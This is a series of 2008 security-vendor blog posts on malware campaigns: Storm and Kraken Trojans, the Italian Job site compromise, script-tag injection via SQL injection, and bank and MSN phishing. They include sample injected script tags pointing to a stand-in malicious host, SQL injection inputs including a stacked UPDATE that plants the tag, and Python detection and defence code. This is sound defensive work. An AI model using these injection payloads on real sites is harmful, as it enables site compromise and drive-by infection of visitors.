Posts filed under 'Malware'

April Malware Roundup

May 6th, 2008 by Jasper Pimentel (Advanced Threats Researcher)

Last month started with an April Fool’s message being spammed around. The spammed email contained a link from which a variant of the Storm malware could be downloaded. Aside from that, we had our usual fill of Trojans and malicious scripts plaguing compromised Web sites in April.

Notable Malware

TROJ_AGENT.AMAL
This Trojan poses as a browser plugin that must be installed before viewing files that supposedly come from a US federal judiciary Web site; the site is fake. Reported last April 15, the link to the fake site arrives in spammed email messages claiming to be legitimate court subpoenas. To add credibility, the sender uses a uscourts.com email address, which may look authentic to unsuspecting recipients even though the judiciary’s real domain is uscourts.gov.

TROJ_SPAMBOT.AF
TROJ_SPAMBOT.AF is the Trend Micro detection for the malware behind Kraken, which is an emerging botnet rivaling the Storm botnet. Some researchers who have analyzed Kraken have stated that this may be a variant of the Bobax malware family.

TROJ_AGENT.AZZZ
Reported last April 5, this Trojan uses an old technique to trick users into compromising their own systems. Users receive a spammed email, under the guise of a Microsoft security bulletin, urging them to download a patch from a link in the message. The “patch” is of course the malware itself, which Trend Micro detects as TROJ_AGENT.AZZZ. Microsoft does not distribute security updates through links in unsolicited email; that alone should give such a message away.

WORM_NUWAR.JQ
TrendLabs researchers discovered a Web site that offers what looks like a YouTube-style streaming video service. The infection vector and messaging are actually still the same — that is, users are most likely to access this site via links on specially crafted blogs. What is interesting this time is that on the suspect site, users are required to download the so-called “Storm Codec” in order to view the video. Yes, you read that right: the codec is called Storm Codec. Of course, the “codec” is actually a NUWAR variant, which Trend Micro already detects as WORM_NUWAR.JQ since April 2.

Exploits and Vulnerabilities

BKDR_POISONIV.QI and EXPL_NEVAR.B
Right after Patch Tuesday last April 8, a backdoor was found exploiting a recently patched vulnerability in Microsoft’s GDI image processing. The exploit file, named TOP.JPG, is detected as EXPL_NEVAR.B. The vulnerability gives the attacker code execution, so the payload could be anything; in this case the exploit’s routine is to connect to a URL and download a file named WORD.GIF, which is a backdoor detected as BKDR_POISONIV.QI.

Web Incidents

JS_DLOADER.TVP and JS_IFRAME.US
Early this month, several Web sites were compromised in a search engine optimization (SEO) poisoning campaign. The compromised sites included that of Washington State University and several news sites such as the Sun Gazette and the Tribune-Chronicle. For the past few months, education Web sites (*.edu) have been the ones targeted by such attacks, averaging about three per month. In this recent incident, JS_IFRAME.US is the iframe component inserted into the HTML of the compromised pages. When the browser follows this malicious iframe, it loads the malicious script file JS_DLOADER.TVP.

That’s it for today. As of this writing, it seems that another Italian Job is underway, with ~100 compromised Web sites. We shall take a look at more of this in next month’s malware roundup.

One Year Later, Italian Job Still Working Overtime

May 2nd, 2008 by Macky Cruz (Technical Communications)

In what may turn out to be an early one-year “toast” to the June 2007 mass infection known as the Italian Job, TrendLabs discovered 90 compromised Italian Web sites (all verified active as of this writing) at around 12:30 AM GMT. The compromised sites are varied; their only common thematic link seems to be the Italian language.

According to Trend Micro analysts, the attack rolls out like this:

1. The compromised Web sites contain obfuscated JavaScript code (detected as JS_AFIR.A) that redirects the browser to the malicious URL http://{BLOCKED}r.com/cgi-bin/index.cgi?grb&js=1.

The script checks the Internet Explorer version and the browser language so that it only executes on Italian-language installations.

2. The said URL redirects to another URL: http://{BLOCKED}f.com/cgi-bin/index.cgi?grobin (blocked by Web Reputation Services since April 27).

The two malicious sites were found hosted on a single IP address traced to San Diego, California.

3. These sites download TROJ_SINOWAL.CB (detected since April 26 GMT) from the same domain. TROJ_SINOWAL.CB then drops BKDR_SINOWAL.CF (detected since April 30 GMT), which in turn drops a rootkit component onto the affected PC.

This rootkit component modifies certain sectors of the infected hard disk, including the master boot record (MBR). It also hooks Driver.sys so that it can hide these sectors from read and write operations by AV/security software.

See infection diagram below.

SINOWAL malware variants are known information stealer droppers.

As of this writing, TrendLabs has discovered two forms of this compromise: one is an injected obfuscated script that redirects to a certain malicious URL, and the other is a readable iframe combined with the same obfuscated script.

It appears that this attack affects sites hosted in Italy by a single hosting provider — the same one that hosted the thousands of sites (mostly travel and leisure) in last year’s large-scale infection. This time, compromised sites include the following:

  • The official site of Monica Bellucci (famous Italian model-actress)
  • The Mercedes-Benz club of Italy
  • The official Web page of Sabrina Salerno (Italian singer)
  • A Johnny Depp fan site
  • A fan site of Pearl Jam

Here are screenshots of the first three sites mentioned above:

[Screenshots: Monica Bellucci site, Mercedes-Benz club of Italy site, Sabrina Salerno site]

Trend Micro customers are already protected from this threat. Web Threat Protection technology has prevented access to the malicious pages since 27 April 2008. The URLs have been added to our emergency database and are blocked by WCS (Web Classify Server), making them inaccessible to customers. The RootkitBuster tool is also able to detect the MBR rootkit component involved in this attack.

Last updated at 5:27 PM GMT, 3 May 2008

Oops, they did it again…

April 29th, 2008 by Alice Decker (Advanced Threats Researcher)

Some days ago, our researchers at TrendLabs discovered an attack on Web sites in the European region. Since the number of compromised sites was low, and because they were cleaned immediately, we figured it might be just a proof of concept.

F-Secure researchers also announced a similar attack in which more than 500,000 sites were affected.

The infection code was a <script> tag pointing to a malicious URL. What was new here is that these tags were inserted inside the usual text tags <title></title>, for example:
<title>My Website <script src=http://maliciousURL.com></script></title>
and also inside <meta>, <a href=>, <div class="myclass"> and similar tags, for example:
<a href=http://goodURL <script src=http://maliciousURL></script>>

An infected Web site would display its infection in the browser window title:

Neither <title> nor <meta> is supposed to contain a <script> tag, but browsers are tolerant of malformed HTML: some will pick up a script tag wherever it is placed and load it.
Visitors to the affected Web sites are thus exposed to whatever the remote script delivers to their systems.
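To check a site for this kind of injection, here is an added example (not code from this post or from Trend Micro) that scans saved HTML for script and iframe tags whose src points off-site and reports where each one sits: inside <title>, inside another tag’s attribute list, or in the body. It covers the tag-in-title and tag-in-attribute placements described above as well as the readable iframe form mentioned in the Italian Job post. The sample page is constructed for the demo and reuses the post’s maliciousURL.com and goodURL placeholders; the trusted-host allowlist is an assumed input.

```python
"""Scan saved HTML for the injected <script>/<iframe> pattern described above.

Added example, not TrendLabs code. The sample page is constructed for the
demo and reuses the post's maliciousURL.com / goodURL placeholders; the
trusted-host allowlist is an assumption about the site being checked.
"""
import re
from collections import namedtuple
from urllib.parse import urlparse

Finding = namedtuple("Finding", "tag context src")

# <script ... src=...> or <iframe ... src=...>, quoted or unquoted value.
# A regex rather than an HTML parser on purpose: the injected tag sits in
# places (inside <title>, inside another tag's attribute list) where a
# parser may swallow it as text or as a bogus attribute name.
TAG_SRC = re.compile(
    r"<\s*(script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def _context(lowered, pos):
    """Describe where in the markup a tag found at offset pos sits."""
    if lowered.rfind("<title", 0, pos) > lowered.rfind("</title", 0, pos):
        return "inside <title>"
    if lowered.rfind("<", 0, pos) > lowered.rfind(">", 0, pos):
        return "inside another tag"   # e.g. between "<a href=..." and its ">"
    return "body"


def scan_page(html, trusted_hosts=()):
    """Return every script/iframe whose src points off-site, with its context.

    Relative src values (the site's own files) and hosts listed in
    trusted_hosts are ignored; everything else is reported.
    """
    trusted = {h.lower() for h in trusted_hosts}
    lowered = html.lower()
    findings = []
    for m in TAG_SRC.finditer(html):
        tag, src = m.group(1).lower(), m.group(2)
        host = urlparse(src).hostname          # None for a relative path
        if host is None or host in trusted:
            continue
        findings.append(Finding(tag, _context(lowered, m.start()), src))
    return findings


# Constructed sample: the placements the post describes, plus a legitimate
# local script and the readable iframe form from the Italian Job post.
SAMPLE_PAGE = """<html><head>
<title>My Website <script src=http://maliciousURL.com></script></title>
<meta name="description" content="Welcome" <script src=http://maliciousURL.com></script>>
<script src="/js/site.js"></script>
</head><body>
<a href=http://goodURL <script src=http://maliciousURL></script>>Home</a>
<div class="myclass">text</div>
<iframe src="http://maliciousURL.com/cgi-bin/index.cgi" width=0 height=0></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, trusted_hosts=["www.example.it"]):
        print("%-6s %-19s %s" % (f.tag, f.context, f.src))
```

Run it over a saved copy of each page on the site. Anything reported as inside <title> or inside another tag is almost certainly injected, since no template puts a script tag there; an external script or a 0x0 iframe in the body needs a look at the allowlist before it is cleared.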

The mass infection of Web sites was reportedly carried out through automated SQL injection. This is not the first instance of this type of attack, and unfortunately it will not be the last.

What is notable about SQL injection is that such attacks can be triggered at any time, regardless of the patch level of the SQL server behind the site. The success of the attack depends on the Web application that uses the SQL server: an application that pastes form fields straight into its queries, with no field content control, is easy to fool into sending the server an SQL statement of the attacker’s choosing. To simplify, a lookup that expects a user ID ends up running:

“SELECT * FROM bank_data WHERE Userid=blah or 1=1”

Here “blah or 1=1” is the attacker’s input, and the “or 1=1” makes the condition true for every row. The defence is in the application: validate field content, and pass user values to the database as bound parameters rather than as part of the query text.
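To make the simplified query above concrete, here is an added example (not code from this post) that runs the same injection against an in-memory SQLite table and shows field content checking, which the post calls for, beside parameter binding. The table, its rows and the function names are constructed for the demo, and the script tag reuses the post’s maliciousURL.com placeholder. The payload is written 'blah' or 1=1 with quotes so the database can evaluate it; a bare blah would be parsed as a column name and the query would error out.

```python
"""The injection the post simplifies as  WHERE Userid=blah or 1=1,  run
against an in-memory SQLite table, beside the two defences.

Added example, not code from the post. The table, its rows and the
function names are constructed for the demo; the script tag reuses the
post's maliciousURL.com placeholder.
"""
import sqlite3

# What the mass-infection payload appends to every text field it can reach.
SCRIPT_TAG = "<script src=http://maliciousURL.com></script>"


def make_db():
    """Constructed sample table standing in for the post's bank_data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE bank_data (Userid INTEGER, Name TEXT, Balance INTEGER)")
    db.executemany("INSERT INTO bank_data VALUES (?, ?, ?)",
                   [(1, "alice", 500), (2, "bob", 1200), (3, "carol", 75)])
    return db


def lookup_vulnerable(db, userid):
    """No field content control: the form field is pasted into the SQL text.

    Input "'blah' or 1=1" turns the WHERE clause into
    Userid='blah' or 1=1, which is true for every row. (The post writes a
    bare blah; the quotes are needed for the database to evaluate it,
    otherwise blah is taken for a column name and the query errors out.)
    """
    return db.execute("SELECT * FROM bank_data WHERE Userid=" + userid).fetchall()


def lookup_parameterized(db, userid):
    """Same query with the value bound as a parameter: it is data, never SQL."""
    return db.execute("SELECT * FROM bank_data WHERE Userid=?", (userid,)).fetchall()


def lookup_checked(db, userid):
    """Field content check in front of the bound query: a user ID is digits only."""
    if not userid.isdigit():
        raise ValueError("Userid must be numeric, got %r" % userid)
    return lookup_parameterized(db, int(userid))


def stacked_update_runs(db):
    """Try the mass-infection style payload through the vulnerable lookup: a
    second statement that appends SCRIPT_TAG to every Name. Returns True if
    the tag actually landed in the table."""
    payload = "1; UPDATE bank_data SET Name = Name || '%s'" % SCRIPT_TAG
    try:
        lookup_vulnerable(db, payload)
    except (sqlite3.Error, sqlite3.Warning):
        # sqlite3's execute() refuses to run more than one statement; a
        # database driver that accepts batched statements would run the
        # UPDATE, and every page built from those fields would carry the tag.
        pass
    return any(SCRIPT_TAG in name for (_, name, _) in db.execute("SELECT * FROM bank_data"))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, honest input :", lookup_vulnerable(db, "2"))
    print("vulnerable, injected     :", lookup_vulnerable(db, "'blah' or 1=1"))
    print("parameterized, injected  :", lookup_parameterized(db, "'blah' or 1=1"))
    print("stacked UPDATE ran       :", stacked_update_runs(db))
```

lookup_parameterized accepts the injected string and simply finds nothing, because the bound value is compared to the column rather than parsed as SQL. The check in lookup_checked is what turns a bad field into a visible error in the application, which is the field content control the post asks for; the two belong together, since validation alone is easy to get wrong for free-text fields.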

The moral of this story is that cyber criminals will have an easy game as long as Web sites are built by construction-kit users or by inexperienced developers who do not consider field content checking.

Trend Micro users are already protected, first through a generic detection of the script, as HTML_IFRAME.YC, and in any case through Web Threat Protection.

Rock Phishers Up the Ante with More ‘Digital Certificates’

April 28th, 2008 by JM Hipolito (Technical Communications)

Our friends at RSA have recently reported on the latest one-two punch employed by the infamous Rock Phish gang (also reported here and here). Best known for easy-to-use kits that yield professional-looking phishing pages, Rock Phish now also introduces information-stealing malware, the Zeus Trojan.

This attack is reminiscent of the Bank of America phishing attack we reported several days ago, in which users are prompted to install a “digital certificate” in order to access the bank’s online login page. Incidentally, that phishing page was also a Rock Phish page.

And apparently there were more: Trend Micro Advanced Threats Researcher Paul Ferguson and the TrendLabs Content Security team came across a couple of malicious “certificates”, detected as TSPY_PAPRAS.AC and TSPY_PAPRAS.AD, which target Comerica Bank and Colonial Bank, respectively.

Below are screenshots of the phishing email and Web page targeting Comerica account holders:

[Screenshot: Comerica phishing email]

[Screenshot: Comerica “certificate” page]

Traditional phishing lures users, via email, to a fake Web site that resembles the login page of a particular institution or company. This time the phishers have made sure they can capture sensitive information even without getting users to log on to a fake page: they plant spyware on the user’s system so that any relevant user action is transmitted to a remote server. Unprotected users thus stand to lose sensitive information.

This recent development makes it even more important to remind users to be wary of clicking links in email, and to keep scanning engines up to date.

Additional text by Paul Oliveria

Curiosity is the Nourishment of Social Engineering

April 21st, 2008 by Alice Decker (Advanced Threats Researcher)

Do you know the story where a human and a monkey lived in two rooms separated by a single door?

The first part of the story says that after a while in that room, the human started to get curious and decided to find out what was happening behind the door. As the human peeked through the keyhole, what he saw was another eye, which apparently was the monkey’s.

Cyber criminals can use the simplest of methods for maximum yield simply by exploiting human curiosity. How?

The first step is to send a spam email message. This message is supposedly sent through well-known botnet infrastructure.

The message above was sent in German but could be sent in any language. In English it reads: “With our completely free service, you can find out who has blocked or deleted you on MSN.”

The link opens a Web site that invites the user to use the free service to check the status of his or her MSN account.

All the user has to do here is “peek through the keyhole” by typing in the MSN account name and the correct password to find out whether the account is “indeed blacklisted”. Of course, no answer comes back. So what happens then?

If the data entered in these fields is valid, it is sent to the engellembul@gmail.com mailbox, and the user has unwittingly become an accomplice to whatever the people behind that mailbox do next.

This gives the cyber criminals free rein to use the unlawfully acquired credentials in any of their illicit activities. The hijacked MSN account can be used to send spam and distribute malware, both by email and through the MSN Messenger instant messaging client. Apart from this, the unauthorized user gains access to the mailbox itself and can gather personal data about the affected user.
